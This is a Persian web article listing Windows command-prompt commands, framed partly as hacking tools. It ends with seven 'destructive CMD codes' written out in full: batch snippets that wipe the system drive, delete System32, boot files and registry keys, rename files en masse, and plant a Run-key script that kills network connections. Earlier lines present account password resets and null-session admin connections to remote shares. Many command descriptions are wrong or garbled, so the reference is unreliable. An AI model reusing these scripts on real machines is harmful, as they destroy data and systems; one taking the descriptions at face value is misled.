دستورات cmd ،مهمترین و کاربردی ترین دستورات cmd
دستورات cmd برای هک ، دستورات cmd در ویندوز ، دستورات خطرناک cmd ، دستورات شبکه در cmd ،دستورات dos ، دستورات جالب cmd ،ترفند های cmd ، دستور ساخت فایل در cmd
خط فرمان در سیستم عاملهای مانند ویندوز ، لینوکس و… بصورت یک نرم افزار ارائه میشود که Command Prompt نام دارد.
برای وارد شدن به CMD در ویندوز از منو استارت وارد RuN شوید و عبارت Cmd را تایپ کنید و اینتر بزنید ..
مفیدترین دستورات CMD برای هکرها
فهرست مطالب
برای دسترسی به CMD کافی است کلیدهای ترکیبی Win+R را فشار دهید تا Run باز شود. سپس عبارت cmd را وارد کرده و Enter بزنید.
۱. ping
این دستور به شما اجازه میدهد که پی ببرید میزبان مورد نظر شما در حال حاضر دردسترس است یا خیر. بدین معنا که به هنگام اجرای دستور ping، میزبان در صورت متصل بودن چه پاسخی را برای شما ارسال میکند.
برای استفاده از این دستور کافی است عبارت ping را به همراه IP یا دامنهی سایت یا کلاینت مورد نظر وارد نمایید. به عنوان مثال:
ping 8.8.8.8
ping www.google.com
پاسخ دریافتی از میزبان بیانگر وضعیت آن است. هر چه زمان درج شده در مقابل time، کمتر باشد و پاسخ دریافتی عاری از خطا باشد، به این معناست که سرعت اتصال به آن بیشتر و وضعیت آن نیز پایدارتر است.
۲. nslookup
این دستور کاربردهای گوناگونی دارد. یکی از آنها یافتن IP از روی DNS است. فرض کنید آدرس یک سایت را میدانید اما از IP آن بیخبر هستید. با استفاده از این دستور میتوانید به IP هر سایتی پی ببرید. به عنوان مثال:
nslookup www.google.com
یکی دیگر از کاربردهای nslookup در یافتن IP یک میل سرور خاص است. به عنوان مثال برای یافتن IP میل سرورهای یاهو این دستورات بایستی به ترتیب وارد شوند:
nslookup
set type=mx
yahoo.com
۳. tracert
با استفاده از این دستور میتوانید از مسیری که یک بسته در شبکه طی میکند تا به مقصد برسد اطلاعات خوبی کسب کنید. این دستور برای مسیریابی بستهی ارسالی تا مقصد بسیار مفید است.
برای یافتن محل افراد از طریق ای پی ( در مراحل پیشرفته )
مثال:
tracert 8.8.8.8
tracert www.google.com
۴. arp
این دستور جدول arp را برای شما نمایش میدهد. در این جدول، IPها و آدرس معادل MAC آنها نگهداری میشوند. اگر فعالیت غیرقانونی در شبکهی شما رخ داده است و به عنوان مثال کارت شبکهای بدون اجازهی شما تعویض شده است، از طریق این جدول میتوانید به سادگی به این موضوع پی ببرید:
arp -a
۵. route
این دستور اطلاعات کامل مربوط به لیست کارتهای شبکه، جدول مسیریابی و درگاههای هر یک را برای شما بازگو میکند:
route print
۶. ipconfig
این دستور اطلاعات مفیدی در خصوص IP و Gateway شما، DNS در حال استفاده و نظایر آن را برای شما نمایش میدهد:
ipconfig
یا
ipconfig /all
همچنین اگر از IP دینامیک استفاده میکنید و مایلید IP خود را تغییر دهید با این دستورات میتوانید این کار را انجام دهید:
ipconfig /release
ipconfig /renew
۷. netstat
این دستور وضعیت اتصالات شما را نمایش میدهد:
netstat
نمایش تمامی پورتهایی که در وضعیت شنود قرار دارند و اتصال با نام DNS:
netstat -a
نمایش تمامی اتصالات باز و IP آنها:
netstat -n
ترکیب دو حالت بالا:
netstat -an
دستور زیر نیز تمامی پوشههای به اشتراکگذاشتهشده در رایانهی مقصد را نمایش میدهد:
net view x.x.x.x
یا
net view computername
به جای x.x.x.x و computername بایستی آدرس IP یا نام رایانه را وارد نمایید.
۸. netuser
این دستور رمز عبور حساب کاربری ویندوز را بدون دانستن رمز قبلی تغییر میدهد:
net user Tarfandestan *
به جای Tarfandestan نام کاربری ویندوز را بنویسید و پس از فشردن Enter، رمز جدید را وارد کنید.
می توان کاربری را اضافه یا کم کرد.
Net user peachlearn /add Net user peachlearn /del
و برای دادن پسورد به کاربر
Net user peachlearn password /add
نکته : برای حذف کاربر دیگر پسوند نمی خواهد
سایر دستورات
دستورات دیگری نیز هستند که میتوانند به شما کمک کنند.
اتصال به دستگاه مقصد با دسترسی Administrator:
net use \ipaddressipc$ “” /user:administrator
به جای ipaddress، آدرس IP را وارد نمایید.
پس از اتصال به مقصد اگر مایل به مرور کل درایو C بودید از این دستور استفاده کنید:
net use K: \computernameC$
به جای computername نام رایانه را وارد کنید. این دستور موجب ایجاد یک درایو مجازی میشود. دقت کنید این دستور زمانی کار میکند که رایانهی مقصد رمز عبور Adminastrator تعیین نکرده باشد.
۱. دستور ASSOC
برای تغییر و نشان دادن اینکه چه فایلی با چه برنامه ای باز شود. (در ویندوز ۷ ممکن است به درستی جواب ندهد)
ASSOC.txt=textfile
۲. دستور ATTRIB
برای نشان دادن وضعیت فایل ها از جمله مخفی بودن و یا سیستمی و فقط خواندنی و…
برای از حالت در آوردن ، در کنار پارامتر حرف – را وارد کنید و برای به حالت در آوردن ، از حرف + استفاده کنید.
[code]ATTRIB –R –H –S C:\boot.ini[/code]
۳. دستور BREAK
برای شکست خط است.
BREAK
۴. دستور BCDEDIT
برای ویرایش فایل بوت و نشان دادن مکان فایلی که رایانه را روشن می کند.
BCDEDIT
۵. دستور CACLS
برای نشان دادن اینکه دسترسی امکان پذیر است یا نه.
CACLS D:
۶. دستور CALL
برای اجرا کردن یک بچ فایل استفاده می شود.
CALLS d:\a.bat
۷. دستور CD
مسیر کلی را نشان می دهد و می توان آن را تغییر داد.
CD /D D:peachlearn32
۸. دستور DHCP
برای نشان دادن وضعیت صفحه ها به کار می رود.
DHCP
۹. دستور CHDIR
در واقع همان دستور CD است.
CD /D D:\peachlearnBREAK
۱۰. دستور CHKDSK
وضعیت درایور را نشان می دهد از جمله فضای مصرف شده و مانده.
CHKDSK D:
۱۱. دستور CHKNTFS
برای نشان دادن اینکه درایوری دارای فرمت NTFS را دارد یا نه.
CHKNTFS D:
۱۲. دستور CLS
برای پاک کردن صفحه کامنت استفاده می شود.
CLS
۱۳. دستور CMD
یک کامنت جدید را باز می کند.
CMD
۱۴. دستور COLOR
متوانید رنگ کامنت را عوض کنید.
COLOR 2
۱۵. دستور COMP
برای ترکیب کردن دو فایل در یک فایل
COMP D:\1.TXT D:\3.TXTCLS
۱۶. دستور Compact
برای فشرده کردن یک فایل یا پوشه به کار می رود
COMPACT /C D:\peachlearnCMD
۱۷. دستور Convert
برای عوض کردن فرمت FAT به فرمت NTFS استفاده می شود.
CONVERT C: /FS:NTFSCMD
۱۸. دستور Copy
برای کپی کردن فایل ها استفاده می شود.
COPY d:\3.txt d:\20CMD
۱۹. دستور Del
برای حذف فایل یا فایل ها به کار می رود.
DEL /Q /S D:\2.TXT
۲۰. دستور Dir
برای نشان دادن اینکه چه فایل هایی در درایو است.
DIR C
۲۱. دستور Diskcompt
برای فشرده کردن فایل ها و ذخیره بر روی فلاپی استفاده می شود.
DISKCOMP
۲۲. دستور Diskcopy
در واقع همان دستور بالا است. اما فایل ها را کپی می کند.
DISKCOPY
۲۳. دستور Diskpart
برای نشان دادن پارتیشن درایو ها استفاده می شود.
Diskpart D:
۲۴. دستور Doskey
برای ایجاد ماکرو ها و ویرایش خط های کامنت استفاده می شود.
DOSKEY
۲۵. دستور DriverQuery
برای نشان دادن تمام قطعات نصب شده بر روی سیستم استفاده می شود.
DISKQUERY
۲۷. دستور Erase
همان دستور حذف است.
Erase
۲۸. دستور Exit
برای خروج از کامنت استفاده می شود.
Exit
۲۹. دستور FC
محتویات ۲ فایل متنی را نشان می دهد.
Fc d:\1.txt d:\2.txtCLS
۳۰. دستور Find
جستجو را درون فایل های بررسی می کند.
Find "1.txt"
۳۱. دستور Findstr
جستجو را درون فایل ها بررسی می کند.
FINDSTR d:\1.txt
۳۲. دستور For
برای باز کردن فایل هایی از یک منبع اصلی.
For d:\data1.cab saxas.bat
۳۳. دستور Format
برای فرمت کردن درایور ها استفاده می شود.
Format D:
۳۴. دستور Fsutil
برای به دست آوردن اطلاعاتی از فایل های سیستمی استفاده می شود.
FSUTIL fsinfo c:\autoexec.bat
۳۵. دستور Ftype
تقریبا همان دستور Assoc است.
Ftype
۳۶. دستور Gpresult
تقریبا همان gpedit.msc است.
Gpresult /r
۳۷. دستور Graftabl
برای بدست آوردن شماره برنامه باز شده استفاده می شود.
Graftabl
۳۸. دستور Help
راهنمای دستور های کامنت.
Help
۳۹. دستور Icacls
برای گرفتن بک آپ و… از فایل ها استفاده می شود.
ICACLS [drivename:] path
۴۰. دستور If
برای پردازش در فایل های بچ استفاده می شود.
If/?
۴۱. دستور Label
برای تغییر نام درایور ها استفاده می شود.
Label D: Software
۴۲. دستور MD
برای ایجاد پوشه استفاده می شود.
MD D:\sxs
۴۳. دستور Mkdir
برای ایجاد پوشه های تو در تو استفاده می شود.
Mkdir d:\sxs\sxs\sxs\sxs\32
۴۴. دستور Mklink
پوشه ای بسازید که به راحتی باز نشود.
MKLINK /d /h /j d:\1.txt 0
۴۵. دستور Mode
قطعات سخت افزاری نصب شده را نشان می دهد.
Mode
۴۶. دستور More
برای نشان دادن فایل های متنی و چمد کاربرد دیگر استفاده می شود.
More D:\1.txt
۴۷. دستور Move
برای انتقال فایل استفاده می شود.
Move D:\1.txt G:
۴۸. دستور Openfiles
اگر با رایانه ای دیگر ارتباط داشته باشید ، فایل های آن را نشان می دهد.
Openfiles
۴۹. دستور Path
مسیر جاری را نشان می دهد.
Path
۵۰. دستور Pause
باعث توقف موقت می شود.
Pause
۵۱. دستور Print
برای چاپ یک فایل متنی مورد استفاده قرار می گیرد.
Print D:\1.txt
۵۲. دستور Prompt
برای ویرایش کامنت استفاده می شود.
Prompt $b $t
۵۳. دستور RD
برای حذف یک پوشه به کار می رود.
RD d:\sxs\sxs\sxs\32
۵۴. دستور Defective
برای بازگردانی یک فایل از دیسکت خارجی استفاده می شود.
Defective I:\peachlearn.html
۵۵. دستور REM
برای ضبط پیام هایی که از یک فایل خاص انتشار می شود استفاده می شود.
REM c:\autoexec.bat
۵۶. دستور REN
برای تغییر نام یک فایل و حتی پسوند استفاده می شود.
REN D:\1.txt 2.html
۵۷. دستور Rename
همان دستور بالا است.
Rename E:\1.txt 2.txt
۵۸. دستور Replace
برای جایگزین کردن فایل ها با هم استفاده می شود.
Replace
۵۹. دستور RMDIR
برای حذف پوشه های تو در تو به کار می رود.
RIMDIR
۶۰. دستور Robocopy
تقریبا همان فرمان کپی است. (البته کمی پیشرفته تر)
Robocopy
۶۱. دستور SC
برای کار با سرویس ها به کار می رود.
SC Strat Netlogon
۶۲. دستور Schtasks
همه برانامه هایی که در زمان مشخصی شروع می شوند را نشان می دهد و حتی برنامه ای را می توان در زمان مشخصی باز کند.
Schtasks
۶۳. دستور Shutdown
برای خاموش کردن رایانه استفاده می شود.
Shotdown -r -t 00
۶۴. دستور Sort
ترتیب فایل ها را مشخص می کند و البته کاربرد مهمی ندارد.
Sort
۶۵. دستور Start
یک برنامه را اجرا می کند.
Start D:\2.txt
۶۶. دستور Subst
برای ساختن یک درایور از یک پوشه
Subst X: D:\Software
۶۷. دستور Systeminfo
اطلاعات سیستم را نشان می دهد.
systeminfo
۶۸. دستور Tasklist
همه برنامه های فعال را نشان می دهد.
tasklist
۶۹. دستور Taskkill
یک برنامه را قطع می کند
TASKKILL /pid [shomare barname]TASKKILL /pid 2128tasklist
۷۰. دستور Time
زمان سیستم را نشان می دهد و می توان آن را تغییر داد.
TIME 10:10:10
۷۱. دستور Title
عنوان کامنت را عوض می کند.
title PeachLearn
۷۲. دستور Tree
وضعیت پوشه یا درایو ها را به صورت درختی نشان می دهد.
Tree D:
۷۳. دستور Type
متن درون یک فایل را باز می کند.
Type D:\2.txt
۷۴. دستور Ver
نسخه ویندوز را نشان می دهد.
ver
۷۵. دستور Vol
شماره دیسک یا درایو را نشان می دهد.
vol d:
۷۶. دستور Net User
کاربرانی که از رایانه استفاده می کنند را نشان می دهد.
net user
۷۷. دستور net start
یک سرویس را شروع می کند.
net start tlntsvr
۷۸. دستور net stop
یک سرویس را متوقف می کند.
net stop tlnstvr
۷۹. دستور IPConfig
آدرس آیپی شما را نشان می دهد.
ipconfig
۸۰. دستور Ping
آیپی هدف را نشان می دهد و همچنین از فعال بودن مقصد هم گزارش می دهد. به جای ایکس ها ادرس اینترنتی یا ای پی ادرس وارد کنید .
Ping xxxx
توضیج دستورات مهم :
۸۱. دستور ATTRIB
این دستور دارای پارامتر های زیر را است :
+ Sets an attribute.
- Clears an attribute.
R Read-only file attribute.
A Archive file attribute.
S System file attribute.
H Hidden file attribute.
I Not content indexed file attribute.
[drive:][path][filename] Specifies a file or files for attrib to process.
/S Processes matching files in the current folder and all subfolders.
/D Processes folders as well.
/L Work on the attributes of the Symbolic Link versus.
the target of the Symbolic Link.
سوییچ های مهم : + و – و R و A و S و H
۸۲. دستور Copy
همانطور که قبلا توضیح دادیم برای کپی کردن فایل ها به کار می رود.
Copy [drive1:path:filename] [drive2:path]Copy D:\2.txt g:
۸۳. دستور MD
یک یا چند پوشه درست می کند.
Md D:\3\3\3\3\3\3\3
۸۴. دستور RD
یک یا چند پوشه را حذف می کند.
Rd D:\3\3\3\3\3\3\3
۸۵. دستور RN
همانطور که در بالا گقته شد ، می توان فرمت فایل ها را هم عوض کرد.
Ren d:\*.txt d:\*.html
نکته : *.* به معنای هر فایل با هر فرمتی است.
۸۶. دستور Subst
همانطور که گفته شد برای ساخت یک درایو از یک پوشه
SUBST Z: c:\windows SUBST X: C: SUBST V: C:\windows\system32
و برای حذف درایو
SUBST /d z: SUBST /d x: SUBST /d v:
۸۸. دستور Echo
برای نشان دادن پیغام از آن استفاده می شود.
@echo off Echo peachlearn
۸۹. دستور netstat -an
برای دیدن آی پی افرادی که در حال ردو بدل اطلاعتا با شما شما هستند
netstat -an
۹۰. دستور Set
مسیر برنامه و پوشه های مهم را نشان می دهد.
دستورات مخرب CMD ویندوز
CMD یا Command Prompt ابزاری در ویندوز برای کار با برنامه های کامندی خود ویندوز و یا سایر آنها است، امروز قصد دارم شما را با ۷ کد مخرب CMD ویندوز آشنا کنیم که البته امیدوارم صرفا جهت مباحث آموزشی مورد استفاده قرار بگیره
این هفت کد از مخرب ترین کدهای ویندوزی هستند که ممکن هست نفوذگر آن را به اسم یک فایل مفید در قالب Bat. در اختیار شما بگذارد…
نکته: همیشه قبل از اجرا فایل های Bat. حتما آن را با یک Editor باز کرده و کدهای آن را آنالیز کنید.
در زیر چند کد خطرناک معرفی میکنم که اگر فایلی با این مشخصاتی دیدید از اجرای آن خودداری کنید:
۱- فرمت و یا پاک کردن کل هارد و آسیب رسانی به آن:
off
del %systemdrive%\*.*/f/s/q
shutdown –r –f –t 00
۲- تبدیل تمامی پسوند ها اجرایی به پسوند Text:
*.DOC*.TXT REN*.JPEG*.TXT
REN *.LNK*.TXT
REN *.AVI*.TXT
REN *.MPEG*.TXT
REN *.COM*.TXT
REN *.BAT*.TXT
۳- حذف فایل مهم سیستمی”System32″ :
c:\WINDOWS\SYSTEM32\*.*/q
۴- این کد در صورتی که اجرا بشه سیستمی دیگه وجود نخواهد داشت:
off
attrib –r –s –h c:\autoexec.bat
del c:\autoexec.bat
attrib –r –s –h c:\boot.ini
del c:\boot.ini
attrib –r –s –h c:\ntldr
del c:\ntldr
attrib –r –s –h c:\windows\win.ini
del c:\windows\win.ini
۵- حذف تمامی ریجستری ها:
OFF
START reg delete HKCR/.EXE
START reg delete HKCR/.dll
START reg delete HKCR/*
۶- نابودی تمامی کانکشن ها اینترنتی:
@echo off >c:windowswimn32.bat
echo break off >>c:windowswimn32.bat
echo ipconfig /release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machineoftwindowscurrentversionrun /v
WINDOWsAPI/t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v
CONTROLexit/t reg_sz /d c:windowswimn32.bat /f
PAUSE
۷- فرمت درایو ها:
D:\
rd/s/q C:\
rd/s/q E
:\
تا حد امکان از این دستورات ها استفاده نکنید؛ مسئولیت هرگونه استفاده نادرست بر عهده خودتان است!
ساتین